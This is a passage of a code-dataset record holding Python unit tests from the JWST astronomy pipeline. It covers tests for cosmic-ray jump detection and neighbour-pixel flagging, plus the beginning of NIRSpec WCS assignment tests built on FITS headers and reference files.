the first row of the second slice\n model1.data[1, 0, yincrement, 25] = 15.0\n model1.data[1, 1, yincrement, 25] = 20.0\n model1.data[1, 2, yincrement, 25] = 25.0\n model1.data[1, 3, yincrement, 25] = 30.0\n model1.data[1, 4, yincrement, 25] = 35.0\n model1.data[1, 5, yincrement, 25] = 40.0\n model1.data[1, 6, yincrement, 25] = 50.0\n model1.data[1, 7, yincrement, 25] = 160.0\n model1.data[1, 8, yincrement, 25] = 170.0\n model1.data[1, 9, yincrement, 25] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, max_cores, 200, 4, True)\n #check that the neighbors of the CR on the last row were flagged\n assert (4 == out_model.groupdq[0, 5, yincrement-1, 5])\n assert (4 == out_model.groupdq[0, 5, yincrement-1, 6])\n assert (4 == out_model.groupdq[0, 5, yincrement-1, 4])\n assert (4 == out_model.groupdq[0, 5, yincrement, 5])\n assert (4 == out_model.groupdq[0, 5, yincrement-2, 5])\n # check that the neighbors of the CR on the first row were flagged\n assert (4 == out_model.groupdq[1, 7, yincrement, 25])\n assert (4 == out_model.groupdq[1, 7, yincrement, 26])\n assert (4 == out_model.groupdq[1, 7, yincrement, 24])\n assert (4 == out_model.groupdq[1, 7, yincrement+1, 25])\n assert (4 == out_model.groupdq[1, 7, yincrement-1, 25])\n\n\ndef test_twoints_onecr_10_groups_neighbors_flagged_multi(setup_inputs):\n \"\"\"\"\n A multiprocessing test that has two CRs on the boundary between two slices\n in different integrations. This makes sure that we are correctly flagging\n neighbors in different slices and that we are parsing the integrations correctly.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nints=2,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n model1.data[1, 0, 15, 5] = 15.0\n model1.data[1, 1, 15, 5] = 20.0\n model1.data[1, 2, 15, 5] = 25.0\n model1.data[1, 3, 15, 5] = 30.0\n model1.data[1, 4, 15, 5] = 35.0\n model1.data[1, 5, 15, 5] = 40.0\n model1.data[1, 6, 15, 5] = 45.0\n model1.data[1, 7, 15, 5] = 160.0\n model1.data[1, 8, 15, 5] = 170.0\n model1.data[1, 9, 15, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 'half', 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 6])\n assert (4 == out_model.groupdq[1, 7, 15, 4])\n assert (4 == out_model.groupdq[1, 7, 16, 5])\n assert (4 == out_model.groupdq[1, 7, 14, 5])\n\[email protected](reason=\"Test is only used to test performance issue. No need to run every time.\")\ndef test_every_pixel_CR_neighbors_flagged(setup_inputs):\n \"\"\"\"\n A multiprocessing test that has a jump in every pixel. This is used\n to test the performance gain from multiprocessing.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, :, :] = 15.0\n model1.data[0, 1, :, :] = 20.0\n model1.data[0, 2, :, :] = 25.0\n model1.data[0, 3, :, :] = 30.0\n model1.data[0, 4, :, :] = 35.0\n model1.data[0, 5, :, :] = 140.0\n model1.data[0, 6, :, :] = 150.0\n model1.data[0, 7, :, :] = 160.0\n model1.data[0, 8, :, :] = 170.0\n model1.data[0, 9, :, :] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 'half', 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n\ndef test_crs_on_edge_with_neighbor_flagging(setup_inputs):\n \"\"\"\"\n A test to make sure that the neighbors of CRs on the edges of the\n array are flagged correctly.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n # CR on 1st row\n model1.data[0, 0, 0, 15] = 15.0\n model1.data[0, 1, 0, 15] = 20.0\n model1.data[0, 2, 0, 15] = 25.0\n model1.data[0, 3, 0, 15] = 30.0\n model1.data[0, 4, 0, 15] = 35.0\n model1.data[0, 5, 0, 15] = 140.0\n model1.data[0, 6, 0, 15] = 150.0\n model1.data[0, 7, 0, 15] = 160.0\n model1.data[0, 8, 0, 15] = 170.0\n model1.data[0, 9, 0, 15] = 180.0\n # CR on last row\n model1.data[0, 0, 1023, 5] = 15.0\n model1.data[0, 1, 1023, 5] = 20.0\n model1.data[0, 2, 1023, 5] = 25.0\n model1.data[0, 3, 1023, 5] = 30.0\n model1.data[0, 4, 1023, 5] = 35.0\n model1.data[0, 5, 1023, 5] = 140.0\n model1.data[0, 6, 1023, 5] = 150.0\n model1.data[0, 7, 1023, 5] = 160.0\n model1.data[0, 8, 1023, 5] = 170.0\n model1.data[0, 9, 1023, 5] = 180.0\n # CR on 1st column\n model1.data[0, 0, 5, 0] = 15.0\n model1.data[0, 1, 5, 0] = 20.0\n model1.data[0, 2, 5, 0] = 25.0\n model1.data[0, 3, 5, 0] = 30.0\n model1.data[0, 4, 5, 0] = 35.0\n model1.data[0, 5, 5, 0] = 140.0\n model1.data[0, 6, 5, 0] = 150.0\n model1.data[0, 7, 5, 0] = 160.0\n model1.data[0, 8, 5, 0] = 170.0\n model1.data[0, 9, 5, 0] = 180.0\n # CR on last column\n model1.data[0, 0, 15, 1027] = 15.0\n model1.data[0, 1, 15, 1027] = 20.0\n model1.data[0, 2, 15, 1027] = 25.0\n model1.data[0, 3, 15, 1027] = 30.0\n model1.data[0, 4, 15, 1027] = 35.0\n model1.data[0, 5, 15, 1027] = 140.0\n model1.data[0, 6, 15, 1027] = 150.0\n model1.data[0, 7, 15, 1027] = 160.0\n model1.data[0, 8, 15, 1027] = 170.0\n model1.data[0, 9, 15, 1027] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, True)\n # flag CR and three neighbors of first row CR\n assert (4 == out_model.groupdq[0, 5, 0, 15])\n assert (4 == out_model.groupdq[0, 5, 1, 15])\n assert (4 == out_model.groupdq[0, 5, 0, 14])\n assert (4 == out_model.groupdq[0, 5, 0, 16])\n assert (out_model.groupdq[0, 5, -1, 15] == 0) # The one not to flag\n # flag CR and three neighbors of last row CR\n assert (4 == out_model.groupdq[0, 5, 1023, 5])\n assert (4 == out_model.groupdq[0, 5, 1022, 5])\n assert (4 == out_model.groupdq[0, 5, 1023, 4])\n assert (4 == out_model.groupdq[0, 5, 1023, 6])\n # flag CR and three neighbors of first column CR\n assert (4 == out_model.groupdq[0, 5, 5, 0])\n assert (4 == out_model.groupdq[0, 5, 6, 0])\n assert (4 == out_model.groupdq[0, 5, 4, 0])\n assert (4 == out_model.groupdq[0, 5, 5, 1])\n assert (out_model.groupdq[0, 5, 5, -1] == 0)# The one not to flag\n # flag CR and three neighbors of last column CR\n assert (4 == out_model.groupdq[0, 5, 15, 1027])\n assert (4 == out_model.groupdq[0, 5, 15, 1026])\n assert (4 == out_model.groupdq[0, 5, 16, 1027])\n assert (4 == out_model.groupdq[0, 5, 14, 1027])\n\n\ndef test_onecr_10_groups(setup_inputs):\n \"\"\"\"\n A test to make sure that neighbors are not flagged when they are not requested to be flagged.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, False)\n assert (out_model.groupdq[0, 5, 5, 5] == 4)\n assert (out_model.groupdq[0, 5, 4, 5] == 0)\n assert (out_model.groupdq[0, 5, 6, 5] == 0)\n assert (out_model.groupdq[0, 5, 5, 6] == 0)\n assert (out_model.groupdq[0, 5, 5, 4] == 0)\n\ndef test_onecr_10_groups_fullarray(setup_inputs):\n \"\"\"\"\n A test that has a cosmic ray in the 5th group for all pixels except column 10. In column\n 10 the jump is in the 7th group.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n #\n model1.data[0, 0, 5, :] = 15.0\n model1.data[0, 1, 5, :] = 20.0\n model1.data[0, 2, 5, :] = 25.0\n model1.data[0, 3, 5, :] = 30.0\n model1.data[0, 4, 5, :] = 35.0\n model1.data[0, 5, 5, :] = 140.0\n model1.data[0, 6, 5, :] = 150.0\n model1.data[0, 7, 5, :] = 160.0\n model1.data[0, 8, 5, :] = 170.0\n model1.data[0, 9, 5, :] = 180.0\n # move the CR to group 7 for row 10 and make difference be 300\n model1.data[0, 3, 5, 10] = 100\n model1.data[0, 4, 5, 10] = 130\n model1.data[0, 5, 5, 10] = 160\n model1.data[0, 6, 5, 10] = 190\n model1.data[0, 7, 5, 10] = 400\n model1.data[0, 8, 5, 10] = 410\n model1.data[0, 9, 5, 10] = 420\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, False)\n assert (np.all(out_model.groupdq[0, 5, 5, 0:10] == 4)) # The jump is in group 5 for columns 0-9\n assert (out_model.groupdq[0, 7, 5, 10] == 4) # The jump is in group 7 for column 10\n assert (np.all(out_model.groupdq[0, 5, 5, 11:] == 4)) # The jump is in group 5 for columns 11+\n\n\ndef test_onecr_50_groups(setup_inputs):\n \"\"\"\"\n A test with a fifty group integration. There are two jumps in pixel 5,5. One in group 5 and\n one in group 30.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 50\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n model1.data[0, 10:30, 5, 5] = np.arange(190, 290, 5)\n model1.data[0, 30:50, 5, 5] = np.arange(500, 600, 5)\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, False)\n assert (out_model.groupdq[0, 5, 5, 5] == 4) # CR in group 5\n assert (out_model.groupdq[0, 30, 5, 5] == 4) # CR in group 30\n assert (np.all(out_model.groupdq[0, 6:30, 5, 5] == 0)) # groups in between are not flagged\n\n\ndef test_single_CR_neighbor_flag( setup_inputs):\n \"\"\"\"\n A single CR in a 10 group exposure. Tests that:\n - if neighbor-flagging is set, the 4 neighboring pixels *ARE* flagged, and\n - if neighbor-flagging is *NOT* set, the 4 neighboring pixels are *NOT* flagged\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n\n model1, gdq, rnModel, pixdq, err, gain = \\\n setup_inputs( ngroups=ngroups, nrows=5, ncols=6, gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime )\n\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 3, 3] = 15.0\n model1.data[0, 1, 3, 3] = 20.0\n model1.data[0, 2, 3, 3] = 25.0\n model1.data[0, 3, 3, 3] = 30.0\n model1.data[0, 4, 3, 3] = 35.0\n model1.data[0, 5, 3, 3] = 140.0\n model1.data[0, 6, 3, 3] = 150.0\n model1.data[0, 7, 3, 3] = 160.0\n model1.data[0, 8, 3, 3] = 170.0\n model1.data[0, 9, 3, 3] = 180.0\n\n # Flag neighbors\n out_model = detect_jumps( model1, gain, rnModel, 4.0, 1, 200, 4, True )\n\n assert (4 == np.max(out_model.groupdq[0, 5, 3, 3]))\n assert (4 == out_model.groupdq[0, 5, 3, 4])\n assert (4 == out_model.groupdq[0, 5, 3, 2])\n assert (4 == out_model.groupdq[0, 5, 2, 3])\n assert (4 == out_model.groupdq[0, 5, 4, 3])\n\n # Do not flag neighbors\n out_model = detect_jumps( model1, gain, rnModel, 4.0, 1, 200, 4, False )\n\n assert (4 == np.max(out_model.groupdq[0, 5, 3, 3]))\n assert (0 == out_model.groupdq[0, 5, 3, 4])\n assert (0 == out_model.groupdq[0, 5, 3, 2])\n assert (0 == out_model.groupdq[0, 5, 2, 3])\n assert (0 == out_model.groupdq[0, 5, 4, 3])\n\n\ndef test_proc(setup_inputs):\n \"\"\"\"\n A single CR in a 10 group exposure. Verify that the pixels flagged using\n multiprocessing are identical to the pixels flagged when no\n multiprocessing is done.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n\n model1, gdq, rnModel, pixdq, err, gain = \\\n setup_inputs( ngroups=ngroups, nrows=5, ncols=6, nints=2, gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime )\n\n model1.data[0, 0, 2, 3] = 15.0\n model1.data[0, 1, 2, 3] = 21.0\n model1.data[0, 2, 2, 3] = 25.0\n model1.data[0, 3, 2, 3] = 30.2\n model1.data[0, 4, 2, 3] = 35.0\n model1.data[0, 5, 2, 3] = 140.0\n model1.data[0, 6, 2, 3] = 151.0\n model1.data[0, 7, 2, 3] = 160.0\n model1.data[0, 8, 2, 3] = 170.0\n model1.data[0, 9, 2, 3] = 180.0\n\n out_model_a = detect_jumps( model1, gain, rnModel, 4.0, 'half', 200, 4, True )\n out_model_b = detect_jumps( model1, gain, rnModel, 4.0, None, 200, 4, True )\n assert( out_model_a.groupdq == out_model_b.groupdq ).all()\n\n out_model_c = detect_jumps( model1, gain, rnModel, 4.0, 'All', 200, 4, True )\n assert( out_model_a.groupdq == out_model_c.groupdq ).all()\n\n\ndef test_adjacent_CRs( setup_inputs ):\n \"\"\"\n Three CRs in a 10 group exposure; the CRs have overlapping neighboring\n pixels. This test makes sure that the correct pixels are flagged.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = \\\n setup_inputs( ngroups=ngroups, nrows=5, ncols=6, gain=ingain,\n readnoise=inreadnoise, deltatime=grouptime )\n\n # Populate arrays for 1st CR, centered at (x=2, y=3)\n x=2; y=3\n model1.data[0, 0, y, x] = 15.0\n model1.data[0, 1, y, x] = 20.0\n model1.data[0, 2, y, x] = 26.0\n model1.data[0, 3, y, x] = 30.0\n model1.data[0, 4, y, x] = 35.0\n model1.data[0, 5, y, x] = 140.0\n model1.data[0, 6, y, x] = 150.0\n model1.data[0, 7, y, x] = 161.0\n model1.data[0, 8, y, x] = 170.0\n model1.data[0, 9, y, x] = 180.0\n\n # Populate arrays for 2nd CR, centered at (x=2, y=2)\n x=2; y=2\n model1.data[0, 0, y, x] = 20.0\n model1.data[0, 1, y, x] = 30.0\n model1.data[0, 2, y, x] = 41.0\n model1.data[0, 3, y, x] = 51.0\n model1.data[0, 4, y, x] = 62.0\n model1.data[0, 5, y, x] = 170.0\n model1.data[0, 6, y, x] = 200.0\n model1.data[0, 7, y, x] = 231.0\n model1.data[0, 8, y, x] = 260.0\n model1.data[0, 9, y, x] = 290.0\n\n # Populate arrays for 3rd CR, centered at (x=3, y=2)\n x=3; y=2\n model1.data[0, 0, y, x] = 120.0\n model1.data[0, 1, y, x] = 140.0\n model1.data[0, 2, y, x] = 161.0\n model1.data[0, 3, y, x] = 181.0\n model1.data[0, 4, y, x] = 202.0\n model1.data[0, 5, y, x] = 70.0\n model1.data[0, 6, y, x] = 100.0\n model1.data[0, 7, y, x] = 131.0\n model1.data[0, 8, y, x] = 160.0\n model1.data[0, 9, y, x] = 190.0\n\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 'half', 200, 4, True)\n\n # 1st CR (centered at x=2, y=3)\n assert (4 == out_model.groupdq[ 0,5,2,2 ])\n assert (4 == out_model.groupdq[ 0,5,3,1 ])\n assert (4 == out_model.groupdq[ 0,5,3,2 ])\n assert (4 == out_model.groupdq[ 0,5,3,3 ])\n assert (4 == out_model.groupdq[ 0,5,4,2 ])\n\n # 2nd CR (centered at x=2, y=2)\n assert (4 == out_model.groupdq[ 0,5,1,2 ])\n assert (4 == out_model.groupdq[ 0,5,2,1 ])\n assert (4 == out_model.groupdq[ 0,5,2,3 ])\n\n # 3rd CR (centered at x=3, y=2)\n assert (4 == out_model.groupdq[ 0,5,1,3 ])\n assert (4 == out_model.groupdq[ 0,5,2,4 ])\n\n# Need test for multi-ints near zero with positive and negative slopes\n\[email protected]\ndef setup_inputs():\n def _setup(ngroups=10, readnoise=10, nints=1,\n nrows=1024, ncols=1032, nframes=1, grouptime=1.0, gain=1, deltatime=1,\n gain_subarray = False, readnoise_subarray = False, subarray = False):\n times = np.array(list(range(ngroups)), dtype=np.float64) * deltatime\n gain = np.ones(shape=(nrows, ncols), dtype=np.float64) * gain\n\n\n pixdq = np.zeros(shape=(nrows, ncols), dtype=np.float64)\n read_noise = np.full((nrows, ncols), readnoise, dtype=np.float64)\n gdq = np.zeros(shape=(nints, ngroups, nrows, ncols), dtype=np.uint32)\n if subarray:\n data = np.zeros(shape=(nints, ngroups, 20, 20), dtype=np.float64)\n err = np.ones(shape=(nints, ngroups, 20, 20), dtype=np.float64)\n else:\n data = np.zeros(shape=(nints, ngroups, nrows, ncols), dtype=np.float64)\n err = np.ones(shape=(nints, ngroups, nrows, ncols), dtype=np.float64)\n model1 = RampModel(data=data, err=err, pixeldq=pixdq, groupdq=gdq, times=times)\n model1.meta.instrument.name = 'MIRI'\n model1.meta.instrument.detector = 'MIRIMAGE'\n model1.meta.instrument.filter = 'F480M'\n model1.meta.observation.date = '2015-10-13'\n model1.meta.exposure.type = 'MIR_IMAGE'\n model1.meta.exposure.group_time = deltatime\n model1.meta.subarray.name = 'FULL'\n model1.meta.subarray.xstart = 1\n model1.meta.subarray.ystart = 1\n if subarray:\n model1.meta.subarray.xsize = 20\n model1.meta.subarray.ysize = 20\n else:\n model1.meta.subarray.xsize = ncols\n model1.meta.subarray.ysize = nrows\n model1.meta.exposure.frame_time = deltatime\n model1.meta.exposure.ngroups = ngroups\n model1.meta.exposure.group_time = deltatime\n model1.meta.exposure.nframes = 1\n model1.meta.exposure.groupgap = 0\n gain = GainModel(data=gain)\n gain.meta.instrument.name = 'MIRI'\n gain.meta.subarray.xstart = 1\n gain.meta.subarray.ystart = 1\n gain.meta.subarray.xsize = ncols\n gain.meta.subarray.ysize = nrows\n rnModel = ReadnoiseModel(data=read_noise)\n rnModel.meta.instrument.name = 'MIRI'\n rnModel.meta.subarray.xstart = 1\n rnModel.meta.subarray.ystart = 1\n rnModel.meta.subarray.xsize = ncols\n rnModel.meta.subarray.ysize = nrows\n return model1, gdq, rnModel, pixdq, err, gain\n\n return _setup\n" }, { "alpha_fraction": 0.5438500642776489, "alphanum_fraction": 0.6121904253959656, "avg_line_length": 31.48444366455078, "blob_id": "c90591b5595aefa142ef97274106117b3ea56bbc", "content_id": "3850fcd078365729695ffb7d7d17b9ca965b69b7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14618, "license_type": "permissive", "max_line_length": 101, "num_lines": 450, "path": "/jwst/assign_wcs/tests/test_nirspec.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nTest functions for NIRSPEC WCS - all modes.\n\"\"\"\nimport os.path\n\nimport pytest\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom astropy.io import fits\nfrom astropy.modeling import models as astmodels\nfrom astropy import wcs as astwcs\nimport astropy.units as u\nimport astropy.coordinates as coords\nfrom gwcs import wcs\n\nfrom jwst import datamodels\nfrom jwst.transforms.models import Slit\nfrom jwst.assign_wcs import nirspec\nfrom jwst.assign_wcs import assign_wcs_step\nfrom . import data\nfrom jwst.assign_wcs.util import MSAFileError\n\n\ndata_path = os.path.split(os.path.abspath(data.__file__))[0]\n\n\nwcs_kw = {'wcsaxes': 2, 'ra_ref': 165, 'dec_ref': 54,\n 'v2_ref': -8.3942412, 'v3_ref': -5.3123744, 'roll_ref': 37,\n 'crpix1': 1024, 'crpix2': 1024,\n 'cdelt1': .08, 'cdelt2': .08,\n 'ctype1': 'RA---TAN', 'ctype2': 'DEC--TAN',\n 'pc1_1': 1, 'pc1_2': 0, 'pc2_1': 0, 'pc2_2': 1\n }\n\n\nslit_fields_num = [\"shutter_id\", \"dither_position\", \"xcen\", \"ycen\",\n \"ymin\", \"ymax\", \"quadrant\", \"source_id\",\n \"stellarity\", \"source_xpos\", \"source_ypos\"]\n\n\nslit_fields_str = [\"name\", \"shutter_state\", \"source_name\", \"source_alias\"]\n\n\ndef _compare_slits(s1, s2):\n for f in slit_fields_num:\n assert_allclose(getattr(s1, f), getattr(s2, f))\n for f in slit_fields_str:\n assert getattr(s1, f) == getattr(s2, f)\n\n\ndef get_file_path(filename):\n \"\"\"\n Construct an absolute path.\n \"\"\"\n return os.path.join(data_path, filename)\n\n\ndef create_hdul(detector='NRS1'):\n \"\"\"\n Create a fits HDUList instance.\n \"\"\"\n hdul = fits.HDUList()\n phdu = fits.PrimaryHDU()\n phdu.header['instrume'] = 'NIRSPEC'\n phdu.header['detector'] = detector\n phdu.header['time-obs'] = '8:59:37'\n phdu.header['date-obs'] = '2016-09-05'\n\n scihdu = fits.ImageHDU()\n scihdu.header['EXTNAME'] = \"SCI\"\n for item in wcs_kw.items():\n scihdu.header[item[0]] = item[1]\n hdul.append(phdu)\n hdul.append(scihdu)\n return hdul\n\n\ndef create_reference_files(datamodel):\n \"\"\"\n Create a dict {reftype: reference_file}.\n \"\"\"\n refs = {}\n step = assign_wcs_step.AssignWcsStep()\n for reftype in assign_wcs_step.AssignWcsStep.reference_file_types:\n refs[reftype] = step.get_reference_file(datamodel, reftype)\n return refs\n\n\ndef create_nirspec_imaging_file():\n image = create_hdul()\n image[0].header['exp_type'] = 'NRS_IMAGE'\n image[0].header['filter'] = 'F290LP'\n image[0].header['grating'] = 'MIRROR'\n return image\n\n\ndef create_nirspec_mos_file():\n image = create_hdul()\n image[0].header['exp_type'] = 'NRS_MSASPEC'\n image[0].header['filter'] = 'F170LP'\n image[0].header['grating'] = 'G235M'\n image[0].header['PATT_NUM'] = 1\n\n msa_status_file = get_file_path('SPCB-GD-A.msa.fits.gz')\n image[0].header['MSACONFG'] = msa_status_file\n return image\n\n\ndef create_nirspec_ifu_file(filter, grating, lamp='N/A', detector='NRS1'):\n image = create_hdul(detector)\n image[0].header['exp_type'] = 'NRS_IFU'\n image[0].header['filter'] = filter\n image[0].header['grating'] = grating\n image[1].header['crval3'] = 0\n image[1].header['wcsaxes'] = 3\n image[1].header['ctype3'] = 'WAVE'\n image[0].header['lamp'] = lamp\n image[0].header['GWA_XTIL'] = 0.3318742513656616\n image[0].header['GWA_YTIL'] = 0.1258982867002487\n return image\n\n\ndef create_nirspec_fs_file(grating, filter, lamp=\"N/A\"):\n image = create_hdul()\n image[0].header['exp_type'] = 'NRS_FIXEDSLIT'\n image[0].header['filter'] = filter\n image[0].header['grating'] = grating\n image[0].header['lamp'] = lamp\n image[1].header['crval3'] = 0\n image[1].header['wcsaxes'] = 3\n image[1].header['ctype3'] = 'WAVE'\n image[0].header['GWA_XTIL'] = 0.3316612243652344\n image[0].header['GWA_YTIL'] = 0.1260581910610199\n image[0].header['SUBARRAY'] = \"FULL\"\n return image\n\n\ndef test_nirspec_imaging():\n \"\"\"\n Test Nirspec Imaging mode using build 6 reference files.\n \"\"\"\n #Test creating the WCS\n f = create_nirspec_imaging_file()\n im = datamodels.ImageModel(f)\n\n refs = create_reference_files(im)\n\n pipe = nirspec.create_pipeline(im, refs, slit_y_range=[-.5, .5])\n w = wcs.WCS(pipe)\n im.meta.wcs = w\n # Test evaluating the WCS\n im.meta.wcs(1, 2)\n\n\ndef test_nirspec_ifu_against_esa():\n \"\"\"\n Test Nirspec IFU mode using CV3 reference files.\n \"\"\"\n ref = fits.open(get_file_path('Trace_IFU_Slice_00_SMOS-MOD-G1M-17-5344175105_30192_JLAB88.fits'))\n\n # Test NRS1\n pyw = astwcs.WCS(ref['SLITY1'].header)\n hdul = create_nirspec_ifu_file(\"OPAQUE\", \"G140M\")\n im = datamodels.ImageModel(hdul)\n im.meta.filename = \"test_ifu.fits\"\n refs = create_reference_files(im)\n\n pipe = nirspec.create_pipeline(im, refs, slit_y_range=[-.5, .5])\n w = wcs.WCS(pipe)\n im.meta.wcs = w\n # Test evaluating the WCS (slice 0)\n w0 = nirspec.nrs_wcs_set_input(im, 0)\n\n # get positions within the slit and the coresponding lambda\n slit1 = ref['SLITY1'].data # y offset on the slit\n lam = ref['LAMBDA1'].data\n # filter out locations outside the slit\n cond = np.logical_and(slit1 < .5, slit1 > -.5)\n y, x = cond.nonzero() # 0-based\n\n x, y = pyw.wcs_pix2world(x, y, 0)\n # The pipeline accepts 0-based cooridnates\n x -= 1\n y -= 1\n sca2world = w0.get_transform('sca', 'msa_frame')\n _, slit_y, lp = sca2world(x, y)\n\n lp *= 10**-6\n assert_allclose(lp, lam[cond], atol=1e-13)\n\n\ndef test_nirspec_fs_esa():\n \"\"\"\n Test Nirspec FS mode using build 6 reference files.\n \"\"\"\n #Test creating the WCS\n filename = create_nirspec_fs_file(grating=\"G140M\", filter=\"F100LP\")\n im = datamodels.ImageModel(filename)\n im.meta.filename = \"test_fs.fits\"\n refs = create_reference_files(im)\n\n pipe = nirspec.create_pipeline(im, refs, slit_y_range=[-.5, .5])\n w = wcs.WCS(pipe)\n im.meta.wcs = w\n # Test evaluating the WCS\n w1 = nirspec.nrs_wcs_set_input(im, \"S200A1\")\n\n ref = fits.open(get_file_path('Trace_SLIT_A_200_1_V84600010001P0000000002101_39547_JLAB88.fits'))\n pyw = astwcs.WCS(ref[1].header)\n\n # get positions within the slit and the coresponding lambda\n slit1 = ref[5].data # y offset on the slit\n lam = ref[4].data\n\n # filter out locations outside the slit\n cond = np.logical_and(slit1 < .5, slit1 > -.5)\n y, x = cond.nonzero() # 0-based\n\n x, y = pyw.wcs_pix2world(x, y, 0)\n # The pipeline works with 0-based coordinates\n x -= 1\n y -= 1\n\n sca2world = w1.get_transform('sca', 'v2v3')\n ra, dec, lp = sca2world(x, y)\n # w1 now outputs in microns hence the 1e6 factor\n lp *= 1e-6\n lam = lam[cond]\n nan_cond = ~np.isnan(lp)\n assert_allclose(lp[nan_cond], lam[nan_cond], atol=10**-13)\n ref.close()\n\n\ndef test_correct_tilt():\n \"\"\"\n Example provided by Catarina.\n \"\"\"\n disp = datamodels.DisperserModel()\n xtilt = 0.35896975\n ytilt = 0.1343827\n # ztilt = None\n corrected_theta_x = 0.02942671219861111\n corrected_theta_y = 0.00018649006677464447\n # corrected_theta_z = -0.2523269848788889\n disp.gwa_tiltx = {'temperatures': [39.58],\n 'tilt_model': astmodels.Polynomial1D(1, c0=3307.85402614,\n c1=-9182.87552123),\n 'unit': 'arcsec',\n 'zeroreadings': [0.35972327]}\n disp.gwa_tilty = {'temperatures': [39.58],\n 'tilt_model': astmodels.Polynomial1D(1, c0=0.0, c1=0.0),\n 'unit': 'arcsec',\n 'zeroreadings': [0.0]}\n disp.meta = {'instrument': {'name': 'NIRSPEC', 'detector': 'NRS1'},\n 'reftype': 'DISPERSER'}\n\n disp.theta_x = 0.02942671219861111\n disp.theta_y = -0.0007745488724972222\n # disp.theta_z = -0.2523269848788889\n disp.tilt_x = 0.0\n disp.tilt_y = -8.8\n\n disp_corrected = nirspec.correct_tilt(disp, xtilt, ytilt)#, ztilt)\n assert np.isclose(disp_corrected.theta_x, corrected_theta_x)\n # assert(np.isclose(disp_corrected['theta_z'], corrected_theta_z))\n assert np.isclose(disp_corrected.theta_y, corrected_theta_y)\n\n\ndef test_msa_configuration_normal():\n \"\"\"\n Test 